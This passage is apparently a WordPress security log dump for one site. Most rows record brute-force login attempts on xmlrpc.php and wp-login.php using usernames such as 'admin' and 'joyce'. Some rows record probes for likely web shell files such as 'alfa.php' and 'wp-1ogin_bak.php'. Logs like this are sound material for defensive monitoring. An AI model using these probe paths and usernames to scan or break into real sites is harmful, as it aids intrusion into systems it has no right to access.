2,'efEGHBDaV2bmAO6coLYCl78x','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.95.146.83',1432326739,'admin',0,1665574575.0091,152,'8WpgvOlDJiy4XUCYx1Zd5Nsh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.90.101.113',1046111601,'admin',0,1665574076.4710,152,'Ve183PGL0mAFfgZ6JSndHURY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.135.255.8',2475163400,'newd',0,1665574075.3824,7,'G37U0JwexPy64o9EHIlOWajg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.252.31.179',3120308147,'newd',0,1665573840.8738,152,'3vVCzmXjswqU5bpIeQfS9oyH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.37.254.3',3240492547,'joyce',0,1665573749.8681,152,'BdUkK12asHJDIC7GXSRTwE8M','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.20.111',2335904879,'newd',0,1665573335.6042,152,'JAYPKGN6hpg9ye0b2CuaVIDi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.130.218.189',1736628925,'newd',0,1665573237.4378,7,'DvmnyBt7phY0KGLT5SkfbU4o','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.131.68.19',1753433107,'newd',0,1665572530.8620,7,'SrjsE8Px1JaMfHOtKmGzvVlc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('120.78.15.126',2018381694,'newd',0,1665577994.1160,7,'fCHZOQBPlTrFeVuGLotg5wEq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.245.246.208',2650142416,'wwwadmin',0,1665577790.2841,152,'igqF2srTda6eGWS91JXcUKRl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('137.184.140.67',2310573123,'wadminw',0,1665577303.5684,152,'9ImFwOBxhEaVAYy0qU2TtRPl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.214.194',2487801538,'newd',0,1665577147.3215,7,'6u3lhrzj0FfBgLPdKGTbankY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.116.16.173',1735659693,'newd',0,1665577071.8226,152,'lGsaWM3q8BtL6FSDiuohdbxE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.124.210.118',2994524790,'newd',0,1665576056.7592,152,'X8EMuadw9BmSRYrT6GJijlOx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.4.56',3103917112,'newd',0,1665581914.5396,7,'9rdzLAt3Rj2uGFnBCM8VI6Qb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.87.194.140',1347928716,'newd',0,1665581373.1515,7,'uLAt4ksOcGQ6nbah8r7DTpf3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.89.47.206',861482958,'newd',0,1665581074.4069,7,'FA36ymLQoa2Npcv7PXKHnG9e','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('96.47.229.59',1613751611,'joyce',0,1665580430.6975,152,'pJF2QHErXzx3tnPiNshWRq9l','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('96.47.229.59',1613751611,'Joyce',0,1665580430.2024,152,'kMr4LcxN2WGVPtQyo1q9YKOd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.236.35',3165056035,'newd',0,1665580372.9834,7,'niBcQaKHZPC6LbkAIGSX7esq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('72.167.51.34',1218917154,'wwwadmin',0,1665580011.1817,51,'xsjaFSOVmZ34Nk6EX8CvGrQJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('171.244.0.91',2884894811,'newd',0,1665579914.0597,7,'1FlmABhVnUT4ZspG9vqXyRMP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.69.8.8',2672101384,'newd',0,1665584314.8349,7,'mesGjpqhISBoW1rwYDN4ydcb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('133.130.103.36',2239915812,'newd',0,1665584139.2968,7,'ZJ8kwRta5CjroMDQKeH0zEU3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.46.121.66',3106830658,'admin',0,1665583545.8623,51,'YpS07H9OkBR1MsVDU4Fhteo8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.165',3583549861,'joyce',0,1665583253.5033,152,'mjhsfMy025zctGuaIgn4DA9J','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.31.46.140',1428106892,'',0,1665594562.9966,55,'tsZiC2lXYbV3H5uOTLJd8ekS','','19|0|0|0|cteisys.com/wp-includes/fonts/css.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594556.7894,55,'XuogHCs9yplzGPWi4vE6A0t3','','19|0|0|0|cteisys.com/wp-1ogin_bak.php',0,19,0),('217.151.98.168',3650577064,'Joyce',0,1665590554.2712,152,'lvQVB6mZz9AbfewoD14CIkS5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.151.98.168',3650577064,'joyce',0,1665590369.9352,152,'V5IYHUnuzsAt4G9yW7MNavod','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.146.18.88',1435636312,'newd',0,1665589582.4222,7,'RcmzGpL6gTy8Kfq9b3rBx75k','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.117.225',2806478305,'newd',0,1665586933.1099,7,'0oRPIeYcnfEUz7apxBWb8CAT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('85.31.46.140',1428106892,'',0,1665594555.6472,55,'JsipDPbBL6hN2mtAZoS1MWy3','','19|0|0|0|cteisys.com/wp-content/wp-1ogin_bak.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594554.1616,55,'xQJYw2DkzC6PBcSspO9bhX5g','','19|0|0|0|cteisys.com/cindex.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594552.8182,55,'y45KEVOpBIt8bAN7jaeCzuG3','','19|0|0|0|cteisys.com/wp-booking.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594551.1467,55,'vobkOqz50Y8ZltGMWrSPg2Ld','','19|0|0|0|cteisys.com/alfa.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594550.0300,55,'LgtWBV9wMXDvPElRcU5eH67i','','19|0|0|0|cteisys.com/alfindex.php',0,19,0),('175.178.125.173',2947710381,'newd',0,1665593523.5504,7,'5QKsDdSoABYECXZ1IuxcPqFp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.44.126',3515690110,'Joyce',0,1665592329.1593,51,'um7Wt8dTMCfNHkyiOaEJGSDe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('124.153.66.86',2090418774,'newd',0,1665592217.8957,7,'b4l7OBSkXJ8AvIWqdHcMpV26','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('205.185.116.162',3451483298,'Joyce',0,1665591840.8940,51,'Gy5PqJ8zHhLZS6RpDUbwtkel','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('37.120.210.211',628675283,'joyce',0,1665591062.5333,152,'RNyM5UKBZtwgD6pSEjXP7q89','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.69.8.8',2672101384,'newd',0,1665590903.9209,7,'SL3W6GkIi2nsqTOfd7VozKbQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('85.31.46.140',1428106892,'',0,1665594546.0476,100,'mlIj0oDgOa4eQud2UnB91yNh','','13|0|0|0|cteisys.com/th3_err0r.php',0,13,0),('85.31.46.140',1428106892,'',0,1665594542.9133,100,'cZ9qKeOTWuXSYnagVpvyJ5UD','','13|0|0|0|cteisys.com/larva.php',0,13,0),('85.31.46.140',1428106892,'',0,1665594540.4301,100,'7y1C8t59zZdFIDvQoAUPmBRY','','13|0|0|0|cteisys.com/wpindex.php',0,13,0),('85.31.46.140',1428106892,'',0,1665594539.0429,100,'Bd5fj1SKlD2uEqMrFJcTb7vx','','13|0|0|0|cteisys.com/xmlrp.php',0,13,0),('85.31.46.140',1428106892,'',0,1665594531.1312,100,'Afe9bwXmx0YRMPEK41UhvVuk','','13|0|0|0|cteisys.com/wp-content/plugins/ioptimization/IOptimize.php',0,13,0),('85.31.46.140',1428106892,'',0,1665594523.7923,55,'LyjKTFPAwzxgrJ3q8tN2e5sb','','19|0|0|0|cteisys.com/wp-content/db_cache.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594520.0558,55,'2YgPVqhUOTGKR4A7yex09Fdc','','19|0|0|0|cteisys.com/wp-content/plugins/backup_index.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594510.7978,10,'OLf0zoipBh6s25TtHkEMQm3D','','707|0|0|0|cteisys.com/boom.php',0,707,0),('85.31.46.140',1428106892,'',0,1665594510.7904,55,'OLf0zoipBh6s25TtHkEMQm3D','','19|0|0|0|cteisys.com/boom.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594455.5272,55,'tAnyjlTNDI49SqszJCgoMV0d','','19|0|0|0|cteisys.com/admin.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594444.8223,55,'FdWP1CJl9oSRGOvVmab4iXNt','','19|0|0|0|cteisys.com/wp-content/plugins/t_file_wp/t_file_wp.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594443.1713,55,'oUVhRYXN9wrn8ZaLkJ7xmFgz','','19|0|0|0|cteisys.com/moduless.php',0,19,0),('85.31.46.140',1428106892,'',0,1665594433.1028,55,'l0UFRE6CVemNMADiSQtLgj5n','','19|0|0|0|cteisys.com/style.php',0,19,0),('47.107.242.103',795603559,'newd',0,1665601156.0173,7,'nTjBrKOQE4dcwb6osMeDJvI3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('123.25.21.16',2065241360,'newd',0,1665599913.7618,7,'6rF9KgdJA1Iny4ChfjR3Wi2z','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.21.87.243',3642054643,'newd',0,1665598664.2346,7,'HXEvbncrBxpsRWA7ZOGzlKFt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.57.9',3515693321,'Joyce',0,1665598076.3687,51,'Vo9OWhRmnQA13biza6B0upcS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.162.5',3583549957,'joyce',0,1665597738.4592,152,'D91NRr5seLdpqgUWPXzvmYtS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.59.243.31',2453402399,'',0,1665604397.7340,55,'zjcCX4Zi7TPVtmba2x3SAGRK','','19|0|0|0|cteisys.com/wp-commentin.php',0,19,0),('146.59.243.31',2453402399,'',0,1665604377.1672,55,'qVJlEnCMYhpbGmr5BTN4QzDe','','19|0|0|0|cteisys.com/wp-commentin.php',0,19,0),('13.81.59.92',223427420,'newd',0,1665603625.2322,7,'3TbZyfpkea7RIjVCdBcEium6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.221.171',3091979691,'Joyce',0,1665602640.5782,152,'xti2OXbYPvJDLuw3r0UMn9RI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.94.247.170',2371811242,'newd',0,1665602379.7046,7,'Nh4ksIV9nzgjfpaKbMED8QBl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.254.90.251',1761499899,'joyce',0,1665606719.7491,152,'LAUJKzNhF0I5BEdj28RCGVWo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('187.32.211.193',3139490753,'newd',0,1665606150.2316,7,'lbgA3MxFXTsEB7NuKmoGiCRH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.20',3583549716,'Joyce',0,1665606070.6220,152,'F5RQyYejTOh9nSdbADL8GU0k','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.130.218.178',1736628914,'newd',0,1665604880.6233,7,'aUYjtorRFLNQJSy9bl8Bgh6d','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.126.219.43',3112098603,'newd',0,1665611269.5694,7,'UrSCg8FlWDB451HoQ2ifMRkt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.212.34.69',3168019013,'newd',0,1665610001.6576,7,'Gs5EoM3hRdFaqIUH4ZKBLPyQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.234.124',2806508156,'newd',0,1665608725.3273,7,'Hp2uh8wXG6qO1WinmVKvjILc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('27.72.145.33',457740577,'newd',0,1665615158.0875,7,'rtzhsj0oZX87QME6RTBkJ5PO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.94.76.74',576605258,'newd',0,1665615003.1241,152,'dhg3TvNtSYyZ6PxMErCnjcF5','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('34.94.76.74',576605258,'newd',0,1665615002.0553,152,'WoY4eXD9J07cm31qZEMtu6Vx','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('107.167.244.83',1806169171,'Joyce',0,1665614538.4573,152,'6oO2FXSUZp9bNqldJVgf7hzT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.178.138.5',867338757,'newd',0,1665613849.2702,7,'9GQf8n0yjLY25UORJlrahumo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('134.19.179.203',2249438155,'Joyce',0,1665613839.8101,152,'dTjM7AZyvBHP4OU1g5Wo2iCE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('187.32.211.193',3139490753,'newd',0,1665612573.0454,7,'QIoYxcP4pR83ZO2tegzVAhTf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('120.27.133.69',2015069509,'newd',0,1665618999.7443,7,'sAxY60fIR2kqvdjXUeahW4wE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('187.32.211.193',3139490753,'newd',0,1665616445.5359,7,'2ZNfW9gKTuJRYdL30aEFqk5D','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.178.76.51',867322931,'newd',0,1665622919.9815,7,'vUXLlFzRyscewOmWkbVuxDt8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('134.19.179.235',2249438187,'Joyce',0,1665621805.7285,152,'BOv8MIRAZYTr2nieUduE6opL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.244.167.101',3337922405,'newd',0,1665621576.1951,7,'N0ZiU1cmFC2qMJKjnOskR4Dl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('199.249.230.47',3355043375,'joyce',0,1665620449.0977,152,'Ql6XVc8dvpbyUoEGjJeLkmHn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.50.216',3328324312,'Joyce',0,1665620142.1422,51,'NshySLYiagdmXzInrHqkwf9l','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.36.190',3515688126,'Joyce',0,1665620113.2991,51,'jkdzgmU4tFMKseqCARahrS26','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.98.60.32',3328326688,'Joyce',0,1665619639.5325,51,'4fsILlY0yihMwnSkJoNAKZz7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.107.242.103',795603559,'newd',0,1665625662.0483,7,'sa256BhWiFvy94Gkdzru3c0w','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('134.19.179.243',2249438195,'joyce',0,1665625229.5042,152,'YyPVtKH7EGjUDJZS92qmdFWw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.156.174.155',3114053275,'joyce',0,1665624998.4454,152,'9Y3pEAr1ID8G5V0JfebQ4xCM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.244.167.101',3337922405,'newd',0,1665624282.1012,7,'AtRNzgX6LdHx4j9DPbnJ3wmV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.189.112.27',3116199963,'Joyce',0,1665622921.8392,152,'8ZuUGb0iHnfSlxP2rgkmjzVN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.98.152.12',1734514700,'admin',0,1665627063.6462,152,'51A48hSWaVcFDsorLyGkZnjU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.183.39',3165042471,'newd',0,1665627028.5537,7,'7PnS3xfgadml5LMqtsQbprVW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.91.83.187',861623227,'admin',0,1665626835.5648,152,'KPadv9AnjJcl0f2e6YHWSQow','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.225.117',2733760885,'newd',0,1665632542.7159,152,'5v1RfV03Ms4Xdlxz8YBgrZPI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.21.38.119',3390383735,'newd',0,1665632487.0572,7,'rsQP7fiIE1TDhOj5mw2VoKBv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.240',3583549936,'Joyce',0,1665631937.0351,152,'1alkQBM50vNftgKycEzhIYZd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.165.42.75',3114609227,'newd',0,1665631879.4480,152,'ESbfL5pziVrmWknFYc8G43jR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.104.173',2994759853,'newd',0,1665631514.1467,152,'v5UW7jt04yI2fz8c6hRmEAVT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.46.85.155',3324925339,'newd',0,1665631123.4753,7,'D6SdAvFZ5hMYBtKR9IuzEg4m','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('62.90.101.113',1046111601,'newd',0,1665630614.6666,152,'nJCFHu9NvjoWtaPhUd2r3pOk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.39.235',3496814571,'admin',0,1665636396.7550,152,'3abOUrsR2BS9yAYJmTDoWGXn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.157.241',90545649,'admin',0,1665636067.0042,152,'rCXmF5diETzBkZgLhKOIjels','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.252.230',2733767910,'admin',0,1665636007.6315,152,'hUtXTFl4pGcb6ifAwNu3sSJR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.74.17.225',793383393,'admin',0,1665635618.9311,152,'TF1xqSVbA5RIpGUhZwcy7Pek','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.108.205',2160553165,'admin',0,1665635518.7054,152,'SzQ2NdVeOw9ft6pRYGLEMHWn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.4.134',3103917190,'newd',0,1665635207.1893,7,'9U8qGui4MgPzkYl7pJnscvFZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.109.39.235',3496814571,'admin',0,1665635190.1239,152,'wTzdCVu2QZMyK5EFl71HGhPX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.87.194.140',1347928716,'newd',0,1665634614.4712,152,'HQhtLCT8OMnlsYcURJ5ab1uq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.51.74',3328324426,'Joyce',0,1665634435.0596,51,'ipAm6sEv7DMr9zULxJTwjOlY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.88.52.134',1364735110,'newd',0,1665634223.8281,152,'y89AHjxX0uUfqJTmdC5aknbo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('122.17.148.164',2047972516,'newd',0,1665634083.9951,152,'EkQh8JRY4scjTz3xuV0GrNnI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.180.241.146',1807020434,'admin',0,1665638118.4061,152,'yt5XRK4rY6klSde8Ha23fjQq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('78.46.75.254',1311656958,'admin',0,1665638029.6755,152,'R6prPTvjsLWF9Gkm5iewfCBH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.217.190.82',3000614482,'newd',0,1665637942.2085,7,'ywx49Cbr5dNP27KBDSc0ML6i','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.223.235',3091980267,'Joyce',0,1665637921.1588,152,'EcAa7frUMzFq96kRXSeYGH0u','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.121.252',3451484668,'Joyce',0,1665637903.9364,51,'CQS4KemfbVJ9PNo5xjAYTqIM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('5.101.156.133',90545285,'admin',0,1665637655.0043,152,'jgGuqd9bspRNlFUnJW0Kzri8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.218.143.243',148541427,'admin',0,1665637305.5379,152,'G4oXaZe2qh51nLbrcdRypmN3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('78.46.75.254',1311656958,'admin',0,1665637242.9782,152,'yRf6otM0K5D3ATYu7LbkWXPH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('187.32.188.214',3139484886,'admin',0,1665646085.7395,152,'17JIax5ehbmoGzN2iwAKULyM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.63.47',2806464303,'newd',0,1665645958.1351,7,'cge01Eb6hXWtTGMRQPxw7HdU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('8.29.128.217',136151257,'admin',0,1665644326.3178,152,'EzeX3nFYGdf19xiLtvmRNIoT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.153.68.244',1738097908,'admin',0,1665643870.8808,152,'wspWaFojUXS9HeuhdbAExPG7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.68.87.46',1363433262,'admin',0,1665643531.7668,152,'IsQiOVYbBTCtm7g2fJ51NRjD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.171.180.165',1739306149,'admin',0,1665643430.0319,152,'sKWgFCe36M8k5n4JAi1hTNzb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.110.72.238',795756782,'newd',0,1665643276.2233,7,'pRcv2N71uLUDiIEWHtXdCn0o','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('5.101.156.133',90545285,'admin',0,1665642726.3937,152,'Aqy2fo7jwLan8Xs0RrTFpVkU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.184.242.14',532214286,'admin',0,1665642615.4842,152,'HBnvGt4KEe0oi3PhaOM5urXf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.96.74.105',794839657,'newd',0,1665641922.3575,7,'4LAByY1p3mKd5U6RTzMFVqJb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.154.204.99',3483028579,'admin',0,1665641788.8038,152,'lNqmToh2CuJ6WkX0b79SRrds','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.156.133',90545285,'admin',0,1665641512.2562,152,'FVls1YcbZvQagoS24NWm3KXw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.231.112.85',736587861,'admin',0,1665641399.9042,152,'UF7GquKys318MZHaICrDk4Oj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('152.32.211.172',2552288172,'admin',0,1665641100.8852,152,'Bvc2Yh83o0fwmL7ZDTaGNxp9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.119.122.23',1433893399,'admin',0,1665641051.6270,152,'uNbiK2CMDV3hX6FALEgOYcZl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.165',3583549861,'joyce',0,1665645803.7009,152,'scKF0p1V36ubewfHAOLQWNtx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.184.76',1386592332,'admin',0,1665645766.3573,152,'viHQcfEabRPJ3sSo2BktwdDg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.214.59',2487801403,'admin',0,1665645644.8799,152,'2WDePwBgxy5aU3uF0jZnozbC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.240.211.236',2733691884,'admin',0,1665645300.3300,152,'9PlBOn5DL7RmKNXqMI6YgUsA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('203.112.72.51',3413133363,'admin',0,1665645241.0696,152,'wQrbV2kaFKR0Z9jmXMGydHhO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.210.174.93',148024925,'admin',0,1665644837.6330,152,'7VLC6a91wx5ctvrmRjKSGFXJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.18.52.177',1997681841,'admin',0,1665644755.7019,152,'xlsS6AzqDaWZ75IByGPcpkQY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.91.220.143',861658255,'newd',0,1665644598.5962,7,'rfBqjW8G2UJHITpRnZo1AhEs','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('141.98.102.179',2372036275,'Joyce',0,1665644585.8561,152,'LxKbSJ5jeQoTDcH2IsUWPuXl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.98.102.179',2372036275,'Joyce',0,1665644462.3556,152,'pSDLEKbCRe1i0x27YyMvwOq4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.174.216',2733747928,'admin',0,1665644428.6374,152,'Wmox73DFru2IthTiCK6f9lHX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.64.117.208',3225449936,'newd',0,1665650455.0689,152,'nxwf3lLBP4M8X6qW7UyDdNet','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.220.106.105',534538857,'newd',0,1665650454.7970,152,'jJxSnvrbhazZfDy7A8Nop5sK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.46.105.239',1496213999,'newd',0,1665650449.1920,152,'qg27rsm90vHUZMkwf1JQiTXb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('156.67.73.144',2621655440,'newd',0,1665650449.0269,152,'K0uU1qXGHSQEdwPyCRp9s2kn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.30.32.94',3105759326,'newd',0,1665650448.8099,152,'ReSdg190bvtCFa2DQrW5PuKy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.179.237.9',3283348745,'newd',0,1665650444.5423,152,'m8i5A3hNJYcjTF9PlGVbdXp0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.211.115.226',3335746530,'admin',0,1665650356.5130,152,'yCBoFsVda2r6WmTLMhg5ZJbX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.113.180.18',3497112594,'newd',0,1665650051.6658,7,'ynt17eJQ48wYO3xI9bpFGWUT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.173.161.171',1605214635,'admin',0,1665649987.7482,152,'pWa3GFN6KLgqUZYsVjR74iPo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.99.98',869426018,'admin',0,1665649876.5857,152,'jIHn6fak4iRbCYNQd3O859rc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.176.230.188',3249596092,'admin',0,1665649390.8324,152,'pRsj6ZCuf9xTJ0ONkBoQ4AYg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.8.58.8',1997027848,'admin',0,1665648987.0332,152,'3GlSJep1cahUsfTADvXzYILH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.74.118.242',1732933362,'admin',0,1665648877.9007,152,'aB0g7FEGYlf16HKXxLozwuWq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.106.41.64',2540316992,'newd',0,1665648675.5011,7,'QFD5pJYRETHPlKahzSMU348C','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.79.206.104',575655528,'admin',0,1665648522.4525,152,'AYQFIRfZp75VGcS91zOeNWHv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.77.135.125',1347258237,'admin',0,1665648398.0458,152,'HfN9G2kD18A5CsjonqWS0ahP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.102.27.195',1382423491,'Joyce',0,1665648019.3251,152,'KVAEi92v4FM01N5duDJQGgLY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.127.105.184',2155833784,'Joyce',0,1665654053.8020,152,'exFXREYjTGbJPNO1kr6w9z4f','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.245.215.122',3639990138,'newd',0,1665654009.9345,152,'b0GzlSxRkinYB1prfjVMd4DT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('196.44.176.39',3291263015,'newd',0,1665653915.3630,152,'Rhmb5cnEyNCTDPLvg4Zi0GFW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.95.112.79',2522837071,'admin',0,1665653364.3885,152,'8mViwzXyjGD5kEWR0Kn932u7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('88.135.37.49',1485251889,'admin',0,1665652913.8865,152,'aGp8X1VrEmnR4yvdSw0DjbqT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('175.178.125.173',2947710381,'newd',0,1665652788.3571,7,'dYLuWZB7S6mTX4lUg30sMr9i','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.232.183.66',2783491906,'admin',0,1665652358.8200,152,'onFvQ0HRd9PBX2D18IiApjNu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.244.248.44',3488938028,'admin',0,1665651959.2534,152,'c47ORiNYHjCVG2MeZD6UtA3n','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.69.10',3270067466,'admin',0,1665651830.0982,152,'o5bcAyeS1GfsB3H06W9RDtqK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),